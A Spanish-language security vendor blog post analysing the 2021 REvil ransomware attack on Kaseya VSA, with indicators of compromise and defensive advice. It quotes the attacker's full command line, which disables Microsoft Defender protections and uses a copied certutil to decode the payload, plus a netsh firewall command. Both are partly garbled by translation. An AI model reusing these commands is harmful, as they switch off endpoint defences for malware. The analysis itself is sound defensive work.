• Productos y Servicios
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • En Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plataforma

          • Malware Analysis Platform
        • Pequeña Empresa

          • SOHO Total Edition
        • Servicios

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Ciberseguridad y Data Privacy Concienciación
  • Soluciones
    • BFSI
    • Educación
    • Gobierno
    • Sector Sanitario
    • Tecnología de la información
    • Manufactura
  • Empresa
    • Sobre Nosotros Seqrite
    • Liderazgo
    • Premios y certificaciones
    • Sala de prensa
  • Socios
    • Programa de afiliados
    • Localizar socio
    • Conoce a Nuestro Equipo Directivo
  • Soporte
  • Recursos
    • Blog
    • Whitepapers
    • Datasheets
    • Casos Prácticos
    • Informes de amenazas
    • Manuales
    • PoV
    • Cómo entender la Data Privacy
    • Comprueba tu puntuación de riesgo
    • Diálogos del DPDP
    • Hora de la privacidad
Seqrite Labs Blog
Contactar Ventas ¿Bajo ataque?
  • Productos y Servicios
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • En Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plataforma

          • Malware Analysis Platform
        • Pequeña Empresa

          • SOHO Total Edition
        • Servicios

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Ciberseguridad y Data Privacy Concienciación
  • Soluciones
    • BFSI
    • Educación
    • Gobierno
    • Sector Sanitario
    • Tecnología de la información
    • Manufactura
  • Empresa
    • Sobre Nosotros Seqrite
    • Liderazgo
    • Premios y certificaciones
    • Sala de prensa
  • Socios
    • Programa de afiliados
    • Localizar socio
    • Conoce a Nuestro Equipo Directivo
  • Soporte
  • Recursos
    • Blog
    • Whitepapers
    • Datasheets
    • Casos Prácticos
    • Informes de amenazas
    • Manuales
    • PoV
    • Cómo entender la Data Privacy
    • Comprueba tu puntuación de riesgo
    • Diálogos del DPDP
    • Hora de la privacidad
Inicio  /  Ransomware  / REvil regresa: Profundizando en el ataque de ransomware Kaseya VSA
REvil regresa: Profundizando en el ataque de ransomware Kaseya VSA
15 Julio 2021

REvil regresa: Profundizando en el ataque de ransomware Kaseya VSA

Escrito por Raj Aravind
Raj Aravind
Ransomware

En un evento reciente, Kaseya, proveedor estadounidense de software para MSP y equipos de TI, reportó un ataque global a la cadena de suministro el 2 de julio de 2021, aprovechando el Día de la Independencia de Estados Unidos, ya que el personal para monitorear el ataque sería menor. El grupo de hackers aprovechó la vulnerabilidad de día cero en el software Kaseya VSA para implementar el ransomware REvil entre sus clientes. El ataque, aprovechado por REvil, podría haber afectado a unos 60 MSP y sus clientes comerciales que utilizan la técnica de la cadena de suministro. Los atacantes exigieron un alto rescate por el proceso de descifrado o amenazaron con filtrar la información si no pagaban el rescate.

¿Qué es REvil/Sodinokibi?

REvil/Sodinokibi/Sodin es una nueva marca del ransomware GrandCrab, vinculada al grupo GOLD SOUTHFIELD, con motivaciones económicas. Este grupo es conocido por robar los datos de las víctimas antes de cifrarlos y amenaza con liberarlos si no se paga el rescate.

Han estado activos desde abril de 2019 y han causado cerca del 40% del total de infecciones de ransomware a nivel mundial. Inicialmente, el grupo atacaba Asia y Europa, pero ahora se ha expandido por todo el mundo.

Cuando el ransomware surgió por primera vez, explotaba vulnerabilidades en servidores y otros activos críticos de pymes e instaladores de software para explotar kits. Pero ahora, han comenzado su tendencia hacia ataques a la cadena de suministro. Ya hemos publicado... blog Respecto a GrandCrab, que se parece mucho al REvil ataque de ransomware.

¿Cómo entraron los atacantes?

Los piratas informáticos lanzaron un ataque contra los proveedores de MSP y explotaron la vulnerabilidad de día cero [CVE-2021-30116] en servidores VSA locales. Al infiltrarse en el servidor VSA, cualquier cliente conectado realizará cualquier tarea que el servidor VSA solicite sin cuestionarla. Los atacantes deshabilitan el acceso administrativo a VSA una vez que acceden a la red de la víctima.

Se descubrió que los atacantes utilizaron las siguientes direcciones IP para iniciar el ataque mientras usaban el usuario “agent curl/7.69.1”.

  • 18[.]223.199.234
  • 161[.]35.239.148
  • 35[.]226.94.113
  • 162[.]253.124.162

A diferencia del ataque a la cadena de suministro de SolarWinds, los servidores de Kaseya no presentan indicios de vulnerabilidad. Muchos de los clientes de Kaseya son proveedores de servicios gestionados (MSP). Los hackers explotaron la versión local del software y pudieron transmitir fácilmente el ataque de ransomware.

La cantidad exigida por el grupo oscila entre 50,000 y 5 millones de dólares, dependiendo de si el sistema está conectado a un dominio. Además, han exigido 70 millones de dólares por el descifrador universal, publicado en su sitio web oscuro.

 

Los detalles técnicos del ataque de día cero de Kaseya VSA

  1. La etapa inicial comienza cuando el proceso malicioso de los proveedores de servicios administrados (MSP) llega a los usuarios.
  2. El proceso VSA implementó el cifrado denominado “Kaseya VSA Agent Hotfix”, que se ejecuta en el sistema con acceso de administrador para eludir las medidas de seguridad para procesar la actualización.
  3. A continuación se muestra el script ejecutado, que deshabilita el servicio Microsoft Defender, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio y DisableScriptScanning.
    “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Deshabilitado -EnableNetworkProtection AuditMode -Force -MAPSReporting Deshabilitado -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe y c:\kworking\agent.exe

     

  4. Cuando se procesa esta actualización, entrega la carga útil REvil con el cargador ejecutable malicioso “agent.exe”.
  5. El Agent.exe tiene una firma digital válida firmada por “PE03 TRANSPORT LTD” y fue firmado un día antes del ataque.

    Llamada del archivo Mpsvc.dll cargado lateralmente mediante MsMpEng.exe
  6. Al utilizar “MsMpEng.exe”, se carga lateralmente el “Mpscv.dll” para ejecutar el ransomware.
  7. La cadena de proceso general se describe a continuación.

    Proceso general

Sobre la ejecución del ransomware REvil.

  • Inicia el proceso descifrándose en la memoria y extrayendo el archivo de configuración almacenado en formato JSON con los parámetros de configuración como se muestra. aquí.
  • A diferencia de otras versiones, esta no elimina las instantáneas de Windows, como suele ocurrir con la mayoría del ransomware. Activarla podría detener el proceso, ya que la mayoría de las empresas de antivirus la utilizan como mecanismo de detección de ransomware.
  • El cifrado AES se utiliza para cifrar las claves privadas del par de claves privada-pública, que se genera localmente en la máquina del usuario.
  • Salsa20, por otro lado, se utiliza para encriptar archivos de usuario.

    Guarda la configuración en el Registro
  • También crea la clave de registro "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter", donde se almacenan las claves generadas. Esta clave contiene una clave privada cifrada por la clave pública en la configuración. Las claves pública y privada se cifran en el binario. La cadena cifrada con la información se envía a los servidores C2, donde se añade una extensión de archivo aleatoria a los archivos cifrados.
  • Al usar el comando que se indica a continuación, se agregan configuraciones de firewall de Windows para permitir que otras computadoras detecten el sistema local en la red local.
netsh advfirewall firewall establecer grupo de reglas=”Descubrimiento de red” nueva habilitación=Sí
  • El cifrado comienza con múltiples subprocesos y cifra los archivos proporcionados en las extensiones, incluidas las unidades de red.
  • REvil utiliza el algoritmo de generación e intercambio de claves "Diffie-Hellman de curva elíptica" para generar un par de claves pública-privada. Se desarrolla una clave secreta compartida para usarla como clave en los algoritmos de cifrado simétrico AES y Salsa20.
  • Una vez hecho esto, se coloca un archivo de nota de rescate en cada carpeta con procedimientos sobre cómo recuperar los archivos.

    Nota de rescate
  • El descifrado sólo se puede realizar tras el pago del importe del rescate, ya que la herramienta de descifrado universal aún no está disponible.

    Página de descifrado en la dark web

Conclusión

Kaseya lanzó el parche el 11 de julio y también restableció la infraestructura SaaS de VSA. El parche se puede descargar desde aquíTambién han lanzado una herramienta para escanear y detectar posibles riesgos de explotación en el servidor VSA y para escanear endpoints. Descargar Aquí está. El ransomware es el problema más grave que interrumpe las operaciones. La motivación principal son los beneficios económicos que obtienen los atacantes. No podemos detener los ataques dirigidos, pero sí podemos prevenirlos.

Seqrite Aconseja a las organizaciones que estén alerta ante el creciente riesgo de ataques de ransomware y que se preparen con planes de respuesta ante incidentes y un equipo que pueda escalar los problemas.

Las formas proactivas de prevenir/limitar este tipo de ataques son:

  • Incluya la cadena de suministro en su plan de respuesta y remediación.
  • Mapear el panorama de amenazas.
  • Asegúrese de que los proveedores de su cadena de suministro tengan políticas y procedimientos de seguridad estructurados, validados y certificados.
  • Mantenga copias de seguridad actualizadas de datos valiosos para mitigar el daño causado.

Cómo Seqrite ¿Protege a sus usuarios?

Quick Heal proporciona herramientas proactivas para bloquear la carga útil del ransomware en esta ola de ataques. Quick Heal detecta las muestras con los siguientes nombres de detección:

  • Trojanransom.Gen
  • Trojanransom.Sodin
  • Rescate.Mal
  • Codificador de rescate de Trojan
  • Trojan.Agent

Indicadores de compromiso (IoC)

Cargador

  • 0299e3c2536543885860c7b61e1efc3f
  • 5a97a50e45e64db41049fd88a75f2dd2
  • be6c46239e9c753de227bf1f3428e271
  • 835f242dde220cc76ee5544119562268
  • 18786bfac1be0ddf23ff94c029ca4d63
  • 8535397007ecb56d666b666c3592c26d
  • 561cffbaba71a6e8cc1cdceda990ead4

DLL

  • 78066A1C4E075941272A86D4A8E49471
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • 849fb558745e4089a8232312594b21d2
  • 4a91cb0705539e1d09108c60f991ffcf
  • 7d1807850275485397ce2bb218eff159
  • a560890b8af60b9824c73be74ef24a46
  • a47cf00aedf769d60d58bfe00c0b5421

Archivo de configuración de REvil

Haga clic aquí

Referencias

Aviso sobre el ataque de ransomware a la cadena de suministro de Kaseya VSA

 

 

 

 Publicación anteriorSeqrite Se descubre la segunda oleada de la Operación SideCopy dirigida contra Indi...
Publicación siguiente  ¿Te estás migrando a la nube? Aprende a gestionar tus riesgos cibernéticos en...
Raj Aravind

Acerca de Aravind Raj

Aravind Raj es investigador de seguridad en Quick Heal Security Lab. Se interesa por el análisis de malware, la ingeniería inversa y la automatización de tareas, y es una persona que...

Artículos de Aravind Raj »

Artículos Relacionados

  • Mejores técnicas de respuesta ante incidentes de ransomware para minimizar los daños

    2 de junio de 2026
  • Cómo recuperarse de un ataque de ransomware sin pagar el rescate.

    25 de mayo de 2026
  • Ataque de ransomware a través de conexiones SMB2 compartidas públicamente y cómo mantenerse protegido con Seqrite

    Marzo 11, 2025
Autores destacados
  • Seqrite
    Seqrite

    Seqrite es un proveedor líder de soluciones de ciberseguridad empresarial. Con un enfoque...

    Leer más artículos por Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Soy una escritora apasionada que disfruta creando contenido sobre tecnologías emergentes y...

    Leer más artículos de Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Soy un apasionado de la ciberseguridad y un escritor dedicado. Con cierta habilidad...

    Lea más artículos de Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar es el director general adjunto de Quick Heal Technologies...

    Lee más artículos de Sanjay Katkar.
Temas
apto (25) Ataque cibernetico (36) Ataques ciberneticos (58) ciberataque (16) Ataques ciberneticos (15) Ciberseguridad (341) seguridad cibernética (34) Amenaza cibernética (33) ciberamenazas (51) Violacíon de datos (56) violaciones de datos (29) De pérdida de datos (28) prevención de pérdida de datos (34) data privacy (16) protección de datos (34) seguridad de datos (19) DLP (50) DPDP (14) DPDPA (17) Cifrado (16) seguridad de punto final (113) Seguridad empresarial (20) Explotar (13) GDPR (14) el malware (76) análisis de malware (14) ataque de malware (23) MDM (27) Microsoft (15) MITRE ATT & CK (14) Seguridad de la red (26) phishing, (30) Ransomware (69) ataque de ransomware (31) ataques de ransomware (31) protección contra ransomware (17) Seqrite (41) Seqrite Cifrado (27) Seqrite EPS (33) Seqrite Servicios (16) detección de amenazas (14) Threat Intelligereza (21) UTM (34) Vulnerabilidad (16) cero confianza (13)
Seqrite Labs

Proveedor líder de soluciones de seguridad de TI empresarial que simplifica la seguridad de puntos finales, datos y redes con las mejores soluciones de prevención, detección y respuesta a amenazas de su clase en todo el mundo.

Leer más sobre Seqrite

Síguenos en:

Suscríbete a nuestro boletín

Manténgase informado sobre las últimas tendencias y conocimientos en materia de ciberseguridad.

Carga
Productos y Servicios
  • Cloud
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • En Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Plataforma
  • Malware Analysis Platform
  • Microempresa
  • SOHO Total Edition
  • Servicios
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Ciberseguridad y Data Privacy Concienciación
Recursos
  • Blog
  • Whitepapers
  • Datasheets
  • Informes de amenazas
  • Manuales
  • PoV
  • Cómo entender la Data Privacy
  • Diálogos del DPDP
  • Cumplimiento de la política
  • EULA
  • GoDeep.AI
  • SIA
  • Hora de la privacidad
Contáctenos
  • Oficinas registradas
  • Hablemos de ciberseguridad
Soporte
  • Soporte técnico
  • Descargar Software
  • Actualizador sin conexión
  • Actualizaciones de Firmware
  • Actualizaciones
  • Documentación del producto
Sobre Nosotros
  • Sobre Nosotros Seqrite
  • Liderazgo
  • Premios y reconocimiento
  • Sala de prensa
Socio
  • Programa de afiliados
  • Localizar socio
  • Conoce a Nuestro Equipo Directivo
  • Seqrite Certificación

© 2026 Quick Heal Technologies Ltd.

Mapa del sitio Políticas de Privacidad Aviso legal Políticas de cookies Términos de uso